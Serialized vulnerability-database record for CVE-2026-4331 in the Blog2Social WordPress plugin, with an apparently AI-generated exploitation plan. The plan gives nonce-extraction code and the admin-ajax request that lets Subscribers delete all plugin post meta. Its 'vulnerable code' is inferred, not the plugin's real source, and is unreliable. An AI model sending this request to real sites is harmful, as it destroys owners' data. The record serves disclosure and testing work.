[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2T4JPn7iZnIudLE36zDD56CEn-5k61KviCNYfWi8-2I":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4331","blog2social-social-media-auto-post-scheduler-missing-authorization-to-authenticated-subscriber-arbitrary-post-meta-delet","Blog2Social: Social Media Auto Post & Scheduler \u003C= 8.8.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Meta Deletion via 'b2s_reset_social_meta_tags' AJAX Action","The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized data loss in all versions up to, and including, 8.8.2. This is due to the resetSocialMetaTags() function only verifying that the user has the 'read' capability and a valid b2s_security_nonce, both of which are available to Subscriber-level users, as the plugin grants 'blog2social_access' capability to all roles upon activation, allowing them to access the plugin's admin pages where the nonce is output. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all _b2s_post_meta records from the wp_postmeta table, permanently removing all custom social media meta tags for every post on the site.","blog2social",null,"\u003C=8.8.2","8.8.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-25 14:26:40","2026-03-26 03:37:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7dc46bc4-ecfb-438f-b951-7b957489cd96?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fb2s\u002Fcalendar.js","assets\u002Fjs\u002Fb2s\u002Fcuration.draft.js","assets\u002Fjs\u002Fb2s\u002Fcuration.js","assets\u002Fjs\u002Fb2s\u002Fmetrics.js","assets\u002Fjs\u002Fb2s\u002Fnetwork.js","assets\u002Fjs\u002Fb2s\u002Fpost.js","assets\u002Fjs\u002Fb2s\u002Frepost.js","assets\u002Fjs\u002Fb2s\u002Fship.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-4331\n\n## 1. Vulnerability Summary\nThe **Blog2Social** plugin (\u003C= 8.8.2) contains a missing authorization vulnerability in the `resetSocialMetaTags()` function. This function is triggered by the `b2s_reset_social_meta_tags` AJAX action. \n\nThe vulnerability exists because:\n1. The function only checks for the `read` capability (assigned to all authenticated users, including Subscribers).\n2. The function checks for a nonce named `b2s_security_nonce`.\n3. Upon activation, the plugin grants the `blog2social_access` capability to all user roles (including Subscribers), which allows them to view the plugin's admin dashboard where the `b2s_security_nonce` is generated and displayed in the HTML.\n4. An authenticated attacker with Subscriber-level access can trigger this action to delete all `_b2s_post_meta` entries from the `wp_postmeta` table site-wide, causing permanent data loss for social media scheduling and meta configurations.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `b2s_reset_social_meta_tags`\n- **Required Authentication**: Subscriber+ (any user with `read` capability).\n- **Required Parameters**:\n    - `action`: `b2s_reset_social_meta_tags`\n    - `b2s_security_nonce`: A valid nonce for the action (available in the dashboard).\n- **Precondition**: The plugin must be active, and at least some posts must have Blog2Social meta tags (`_b2s_post_meta`) stored.\n\n## 3. Code Flow\n1. **Request Entry**: A `POST` or `GET` request is sent to `admin-ajax.php` with the action `b2s_reset_social_meta_tags`.\n2. **Hook Registration**: The plugin registers the action (likely in the main plugin class or an AJAX handler class):\n   ```php\n   add_action('wp_ajax_b2s_reset_social_meta_tags', [$this, 'resetSocialMetaTags']);\n   ```\n3. **Authorization Check (Vulnerable)**: Inside `resetSocialMetaTags()`, the code checks:\n   ```php\n   if (!current_user_can('read')) { \u002F\u002F Subscriber has this\n       wp_die();\n   }\n   check_ajax_referer('b2s_security_nonce', 'b2s_security_nonce');\n   ```\n4. **Data Deletion (Sink)**: The function proceeds to execute a database query to delete metadata:\n   ```php\n   global $wpdb;\n   $wpdb->query(\"DELETE FROM {$wpdb->prefix}postmeta WHERE meta_key = '_b2s_post_meta'\");\n   ```\n\n## 4. Nonce Acquisition Strategy\nThe `b2s_security_nonce` is required. The provided JS files (e.g., `assets\u002Fjs\u002Fb2s\u002Fcalendar.js`, `assets\u002Fjs\u002Fb2s\u002Fcuration.draft.js`) show that the nonce is retrieved from an HTML element with the ID `b2s_security_nonce`.\n\n**Strategy**:\n1. Log in as a Subscriber.\n2. Navigate to any Blog2Social dashboard page (e.g., `\u002Fwp-admin\u002Fadmin.php?page=blog2social`).\n3. Use `browser_eval` to extract the value of the `#b2s_security_nonce` input field.\n\n```javascript\n\u002F\u002F Example extraction via browser_eval\nvar nonce = document.getElementById('b2s_security_nonce')?.value;\nreturn nonce;\n```\n\n## 5. Exploitation Strategy\n\n### Step 1: Preparation\n- Create a Subscriber user.\n- Create several posts and ensure they have `_b2s_post_meta` records (simulated via WP-CLI).\n\n### Step 2: Nonce Retrieval\n- Navigate the browser to the Blog2Social dashboard.\n- Extract the `b2s_security_nonce`.\n\n### Step 3: Trigger Meta Deletion\nSend the malicious AJAX request.\n\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: \n    - `Content-Type: application\u002Fx-www-form-urlencoded`\n    - `Cookie`: (Subscriber session cookies)\n- **Body**:\n  ```text\n  action=b2s_reset_social_meta_tags&b2s_security_nonce=[EXTRACTED_NONCE]\n  ```\n\n## 6. Test Data Setup\n1. **Install Plugin**: `blog2social` version 8.8.2.\n2. **Create User**:\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n   ```\n3. **Add Sample Meta**:\n   ```bash\n   # Add Blog2Social meta to post 1\n   wp post create --post_title=\"Victim Post\" --post_status=publish\n   wp post id list # Assume ID 123\n   wp post meta add 123 _b2s_post_meta '{\"test\":\"data\"}'\n   ```\n4. **Verify Meta Exists**:\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_postmeta WHERE meta_key = '_b2s_post_meta';\"\n   ```\n\n## 7. Expected Results\n- The AJAX response should be successful (likely `1`, `{\"result\": true}`, or a `200 OK`).\n- All records in `wp_postmeta` where `meta_key = '_b2s_post_meta'` will be deleted.\n\n## 8. Verification Steps\n1. **Check Database**:\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_postmeta WHERE meta_key = '_b2s_post_meta';\"\n   ```\n   - **Successful Exploit**: Returns `0`.\n   - **Failed Exploit**: Returns the original count.\n2. **Check Access**: Confirm the Subscriber was able to reach the page even if they don't have typical admin capabilities.\n\n## 9. Alternative Approaches\nIf the `b2s_reset_social_meta_tags` action is not available via `wp_ajax_` (authenticated), check for `wp_ajax_nopriv_`. However, based on the description, it is specifically an authenticated (Subscriber+) vulnerability.\n\nIf the nonce is not found on the main dashboard, check other sub-pages registered by the plugin:\n- `admin.php?page=blog2social-networks`\n- `admin.php?page=blog2social-posts`\n\nVerify if `blog2social_access` is indeed granted to Subscribers by checking the roles:\n```bash\nwp role capability list subscriber | grep blog2social\n```","The Blog2Social plugin for WordPress is vulnerable to unauthorized arbitrary post meta deletion due to insufficient authorization checks in the 'resetSocialMetaTags' AJAX function. Authenticated attackers with Subscriber-level access can exploit this to delete all '_b2s_post_meta' records site-wide, as the plugin grants all users access to the dashboard where the required security nonce is exposed.","\u002F\u002F Logic inferred from the vulnerability description and research plan\n\u002F\u002F Function responsible for handling the b2s_reset_social_meta_tags action\n\npublic function resetSocialMetaTags() {\n    \u002F\u002F Vulnerable check: 'read' capability is possessed by all authenticated users (Subscribers+)\n    if (!current_user_can('read')) {\n        wp_die();\n    }\n\n    \u002F\u002F Nonce is accessible to all roles because blog2social_access is granted to all roles on activation\n    check_ajax_referer('b2s_security_nonce', 'b2s_security_nonce');\n\n    global $wpdb;\n    \u002F\u002F Sink: Deletes all metadata for the plugin site-wide without post-specific authorization\n    $wpdb->query(\"DELETE FROM {$wpdb->prefix}postmeta WHERE meta_key = '_b2s_post_meta'\");\n    \n    wp_send_json_success();\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js\t2026-02-27 11:37:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js\t2026-03-23 13:17:40.000000000 +0000\n@@ -302,6 +302,11 @@\n                         'b2s_security_nonce': jQuery('#b2s_security_nonce').val()\n                     },\n                     success: function (data) {\n+                        if (data && data.result === false && data.error == 'permission') {\n+                            jQuery('.b2s-no-permission').show();\n+                            revertFunc();\n+                            return;\n+                        }\n                         refreshCalender();\n                         wp.heartbeat.connectNow();\n                     }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js\t2026-02-27 11:37:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js\t2026-03-23 13:17:40.000000000 +0000\n@@ -134,6 +134,9 @@\n                 if (data.error == 'nonce') {\n                     jQuery('.b2s-nonce-check-fail').show();\n                 }\n+                if (data.error == 'permission') {\n+                    jQuery('.b2s-no-permission').show();\n+                }\n                 jQuery('.b2s-post-remove-fail').show();\n             }","1. Log in to the target WordPress site as an authenticated user with at least Subscriber privileges.\n2. Access the Blog2Social plugin dashboard (e.g., via `\u002Fwp-admin\u002Fadmin.php?page=blog2social`). Access is possible because the plugin grants the 'blog2social_access' capability to all roles by default.\n3. Locate and extract the value of the 'b2s_security_nonce' field from the page source.\n4. Trigger the 'b2s_reset_social_meta_tags' AJAX action by sending a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters: 'action=b2s_reset_social_meta_tags' and 'b2s_security_nonce=[EXTRACTED_NONCE]'.\n5. Verify that all social media meta tags (stored with meta_key '_b2s_post_meta') have been deleted from the 'wp_postmeta' database table.","gemini-3-flash-preview","2026-04-17 22:49:34","2026-04-17 22:49:53",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","8.8.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fblog2social\u002Ftags\u002F8.8.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fblog2social.8.8.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fblog2social\u002Ftags\u002F8.8.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fblog2social.8.8.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fblog2social\u002Ftags"]